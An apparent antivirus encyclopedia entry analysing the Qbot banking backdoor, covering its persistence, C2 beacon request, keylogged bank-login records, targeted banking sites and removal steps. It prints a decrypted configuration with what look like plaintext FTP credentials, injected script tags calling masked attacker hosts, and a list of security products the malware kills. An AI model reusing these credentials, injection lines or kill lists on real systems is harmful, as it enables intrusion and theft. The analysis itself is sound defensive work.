Trojan-PSW.Win32.Qbot.dkg

From Total Malware Info

Backdoor, designed to steal confidential user data. It is a Windows (PE-EXE file). It is 331,424 bytes in size. It is packed with PE_Patch, as well as an unknown packer. The unpacked file is about 205 KB in size. It is written in C++.

MD5: 8CACA118667B608EB4735AF3B229A546

SHA1: 0B78B4CA846A7F35DC55B13D8AF8767749A97793

Installation

Once launched, the backdoor copies its body to a file:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe

where <rnd_1> - is a random name (for example: "uiouy").

To start the created copy automatically each time the system starts it appends a path to the backdoor copy to a registry value found in the branch:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]

For example:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
<app name> = ""%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe" /c <old value>"

Also the key is created:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
"<rnd_2>" = "%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe"

where <rnd_2> - is a random name (for example: "jladjtrq").

If you the keys cannot be created in the aforementioned branch, these actions will be performed in the branches:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

Then the backdoor extracts from its body the following files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll (154784 bytes; detected by Kaspersky Antivirus as "Trojan-Spy.Win32.Banker.qpl")

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll (453 байта)

where <rnd_3> -are first 4 characters of the name <rnd_1>.

The library "<rnd_1>" implements the main backdoor functionality and will be discussed below. The file "<rnd_3>. dll" contains encrypted information to configure further malware work. The file contained the following lines for analyzed sample:

cc_server_port=16768
cc_server_pass=Ijadsnanunx56512
p2p_node_lst=http://b***01.in/cgi-bin/ls1.pl
ftphost_1=216.***.214.95:cpanel@silfersystem.com:Pomidoro777:
ftphost_2=72.***.86.119:cpanel@gemini.com.co:Columbus101:
ftphost_3=66.***.30.219:cpanel@falahuddarain.com:Alladin71:
ftphost_4=110.***.45.64:cpanel@karnadya.com.my:Islam1120:
ftphost_5=74.***.215.107:cpanel@incitylocal.com:pieceacake100:
update_conf_ver=904

During the work, the backdoor writes generated data to the configuration file, as well as some collected information. For example:

alias__qbot.cb=uiou.dll
alias__qbotinj.exe=uiouy.exe
alias__qbot.dll=uiouy.dll
alias_si.txt=larvsox
home_dir=c:\documents and settings\all users\application data\microsoft\uiouy
irc_my_nick=vwnfjq298080
install_time=21.04.00-16/05/2011
firststart_test=1

In this case, the date and installation time (parameter "install_time") are analyzed. If the backdoor is installed later than "May 5 2011-12:46:11", then upgrading of its components is started. To do this, a connection to the host is established:

bg***t.in

and the following HTTP-request is sent:

POST /5 HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AskTbPSI/5.11.3.15590)
Host: bg***t.in
Content-Length: 65
Cache-Control: no-cache
is=3&ec1=0&ec2=0&it=2&b=679&vt=0&ov=<OS version>&n=<value of parameter irc_my_nick>

At the time of writing, the server did not respond.

During installation, the backdoor collects the following information about the system: - a user name;

- a computer name;

- a key value in the registry:

[HKLM\Software\Microsoft\Windows NT\CurrentVersion]
"ProductId"

- a serial number of a system drive;

- a list of installed software on the infected computer. To do this, it reads the values "ProductName" in the registry branch:

[HKCR\Installer\Products\...]

- IP-address of the infected computer. To determine the IP-address the following resources are used:

http://www.ipaddressworld.com/
http://www.ip-adress.com

To control the uniqueness of its process in the system the backdoor creates a unique identifier with the name:

<name of backdoor file>a<user name>

Upon completion of installation, the malware executes a previously created copy:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe

and deletes its original file. To do this, an executable code is embedded into an address space of the system process "EXPLORER.EXE" that runs firstly a copy, and then the system shell "CMD.EXE" with parameters:

cmd /c ping -n 10 localhost && del "<full path to the original backdoor file>"

At this point the installation process is completed.

The malicious program can be run with the following parameters:

/t – the message WM_QUIT is sent to a created by the malware window "<rnd_1> <username>". Then the malware process is terminated.

/s – the malware is run as a Windows service.

/i – only extracting of files is performed:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll

after that the malware ends its execution.

Payload

Once launched, the backdoor finds in its working directory library extracted during the installation, and call the function with the name "kIlsasgcbag0a". This sets a hook-procedure for tracking messages in the system queue. This allows the trojan to perform the following actions:

• hide files "<rnd_1>. exe", "<rnd_1>. dll" in its working directory;
• hide its own working directory;
• hide its own process in Task Manager;
• hide created during the installation keys in the system registry;
• keep track of user activity of the infected computer (keystrokes, file access, network traffic, etc.). The information obtained is recorded in the file:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll

where <rnd_4> - are the first 3 letters of the name <rnd_1>.

Below is a part of the log created by malicious programs when a user tries to login at "http://www.sovereignbank.com":

t=kb time=[23:46:56-17/5/2011] p=[iexplore.exe] b=[http://www.sovereignbank.com/]
t=u1 time=[23:47:35-17/5/2011] ua=[Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)]
t=h1 time=[23:47:35-17/5/2011] url=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] data=[done=yes&referback=%2Futils%2Fnet_banking_logon.asp&accountType=personal&state=NY] referer=[http://www.sovereignbank.com/personal/forms/regional_prefs.asp?section=personal&refer=/utils/net_banking_logon.asp] cookie=[ACE-WEBCOOKIE-WWW=R364677618; ASPSESSIONIDQASSQDSD=IEFPNFBBDAFAACFKIHCLOKMF; s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520forms%252520/%252520regional_prefs.asp%2526pidt%253D1%2526oid%253Djavascript%25253AcheckSubmit%252528%252529%25253B%2526ot%253DA%2526oi%253D215; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.1.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)]
t=kb time=[23:48:27-17/5/2011] p=[iexplore.exe] b=[MyUserID]
t=h2 time=[23:48:27-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/rsafso.do] data=[fp_browser=mozilla%2F4.0+%28compatible%3B+msie+6.0%3B+windows+nt+5.1%3B+sv1%29%7C4.0+%28compatible%3B+MSIE+6.0%3B+Windows+NT+5.1%3B+SV1%29%7CWin32%7C%3BSP2%3B%7Cx86%7Cru%7C8820&fp_screen=32%7C1920%7C1080%7C1050&fp_software=abk%3D6%2C0%2C2600%2C0%7Cwnt%3D6%2C0%2C2900%2C2180%7Cdht%3D5%2C5000%2C3130%2C0%7Cdhj%3D6%2C0%2C1%2C223%7Cdan%3D6%2C0%2C3%2C531%7Cdsh%3D9%2C0%2C0%2C3250%7Cie5%3D6%2C0%2C2900%2C2180%7Cicw%3D5%2C0%2C2918%2C1900%7Cieh%3D6%2C0%2C2900%2C2180%7Ciee%3D4%2C74%2C9273%2C0%7Cwmp%3D9%2C0%2C0%2C3250%7Cobp%3D6%2C0%2C2900%2C2180%7Coex%3D6%2C0%2C2900%2C2180%7Cnet%3D4%2C4%2C0%2C3400%7Ctks%3D4%2C71%2C1968%2C1%7Cmvm%3D5%2C0%2C5000%2C0&fp_timezone=4&fp_language=lang%3Dru%7Csyslang%3Dru%7Cuserlang%3Dru&fp_java=1&fp_cookie=1&username=MyUserID&x=8&y=8] referer=[https://olb.sovereignbank.com/sovSSA/gitLogonSovbank.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=h2 time=[23:48:32-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/getfso] data=[pmdata=] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38; __utma=21004644.613209303.1305661638.1305661638.1305661638.1; __utmb=21004644.2.10.1305661638; __utmc=21004644; __utmz=21004644.1305661638.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); olbcust=yes; JSESSIONID=00005QD-Jjj-W9JS2le1BeV5ktE:021]
t=kb time=[23:48:51-17/5/2011] p=[iexplore.exe] b=[MyPassword]
t=h2 time=[23:48:51-17/5/2011] url=[https://olb.sovereignbank.com/sovssa/enrollpwdverf.do] data=[password=MyPassword&x=7&y=9] referer=[https://olb.sovereignbank.com/sovSSA/rsaLogon.do] cookie=[s_cc=true; gpv_status=no%20value; s_sq=sovereigndev%3D%2526pid%253Dgpn%25253Epersonal%252520/%252520promotions%252520/%252520Interstitial%252520/%252520ealoc-may2011.asp%2526pidt%253D1%2526oid%253Dhttps%25253A//olb.sovereignbank.com/sovSSA/gitLogonSovbank.do%2526ot%253DA%2526oi%253D38;

Also the considered library exports a function called "zupidshc21mnu", designed to remove the hook.

The backdoor in a cycle tracing launch of the following processes:

iexplore.exe
outlook.exe
firefox.exe
opera.exe
skype.exe
msnmsgr.exe
yahoomessenger.exe
chrome.exe
msmsgs.exe

If the process is found, a malicious library will be injected into its address space.

The considered library implements functionality that allows, depending on the received commands from the attacker, to perform on the infected computer the following actions:

• terminates processes:

msdev.exe
dbgview.exe
mirc.exe
ollydbg.exe
ctfmon.exe

• terminates running in the system services and processes which names contain the substrings:

webroot.
agnitum
ahnlab
arcabit
avast
avg
avira
avp
bitdefender
bit9
castlecops
centralcommand
clamav
comodo
computerassociates
cpsecure
defender
drweb
emsisoft
esafe
.eset
etrust
ewido
fortinet
f-prot
f-secure
gdata
grisoft
hacksoft
hauri
ikarus
jotti
k7computing
kaspersky
malware
mcafee
networkassociates
nod32
norman
norton
panda
pctools
prevx
quickheal
rising
rootkit
securecomputing
sophos
spamhaus
spyware
sunbelt
symantec
threatexpert
trendmicro
virus
wilderssecurity
windowsupdate

• finds and modify files with the extensions:

.inc
.php
.htm
.asp
.pl
.cfm

• infects web pages on user’s FTP and HTTP server user by adding links to malicious scripts into pages:

<script src="http://in***ate.info/3"></script>
<script src=http://in***ate.info/3></script>
<script src="http://pr***t.in/3"></script>
<script src=http://pr***t.in/3></script>

• downloads files by the received from attacker links, saving them in the folder:

%WinDir%\TEMP

• works with files on the specified FTP-servers.
• updates its components, downloading updates from the attacker’s servers.
• controls processes and services.
• steals confidential user information when accessing the resources with the names that contain the substrings:

iris.sovereignbank.com
/wires/
paylinks.cunet.org
securentrycorp.amegybank.com
businessbankingcenter.synovus.com
businessinternetbanking.synovus.com
ocm.suntrust.com
cashproonline.bankofamerica.com
singlepoint.usbank.com
netconnect.bokf.com
business-eb.ibanking-services.com
cashproonline.bankofamerica.com
/cashplus/
ebanking-services.com
/cashman/
web-cashplus.com
treas-mgt.frostbank.com
business-eb.ibanking-services.com
treasury.pncbank.com
access.jpmorgan.com
tssportal.jpmorgan.com
ktt.key.com
onlineserv/CM
premierview.membersunited.org
directline4biz.com
.webcashmgmt.com
tmconnectweb
moneymanagergps.com
ibc.klikbca.com
directpay.wellsfargo.com
express.53.com
itreasury.regions.com
itreasurypr.regions.com
cpw-achweb.bankofamerica.com
businessaccess.citibank.citigroup.com
businessonline.huntington.com
/cmserver/
goldleafach.com
ub-businessonline.blilk.com
iachwellsprod.wellsfargo.com
achbatchlisting
/achupload
commercial3.wachovia.com
wc.wachovia.com
commercial.wachovia.com
wcp.wachovia.com
chsec.wellsfargo.com
wellsoffice.wellsfargo.com
/stbcorp/
/payments/ach
trz.tranzact.org
/wiret
/payments/ach
cbs.firstcitizensonline.com
/corpach/

• steals passwords stored in the browser Internet Explorer. To do this, an analysis of registry keys is performed in the branch:

[HKCU\Software\Microsoft\Internet Explorer\IntelliForms\Storage2]

• steals account information from Outlook Express. To do this, an analysis of registry keys is performed in the branch:

[HKCU\Software\Microsoft\Internet Account Manager\Accounts]

• sends an information collected on the infected computer to the specified server.

While running the backdoor connects to the following servers:

re***rver.com.ua
pp***g.in
du**.in
du**.in
yi**.com.ua
cit***omo.info
last***t.co.in

The connection log is stored by backdoor into the file:

c:\irclog.txt

Removal instructions

If your computer does not have an antivirus, and is infected by this malicious program, follow the instructions below to delete it:

1. Reboot a computer in a “Safe Mode” (at the beginning of system boot, press and hold the «F8», then select the «Safe Mode» the Windows boot menu).

2. Delete the registry keys and restore original values of the keys in system registry:

[HKLM\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Runonce]

3. Delete files:

%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.exe
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_1>.dll 
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_3>.dll
%ALLUSERSPROFILE%\Application Data\Microsoft\<rnd_1>\<rnd_4>.dll
c:\irclog.txt

4. Delete downloaded files in the folder:

%WinDir%\TEMP

5. Clear the Temporary Internet Files directory, which may contain infected files.

6. Change the authentication data for the compromised resources.

7. Perform a full system scan with an antivirus with updated databases.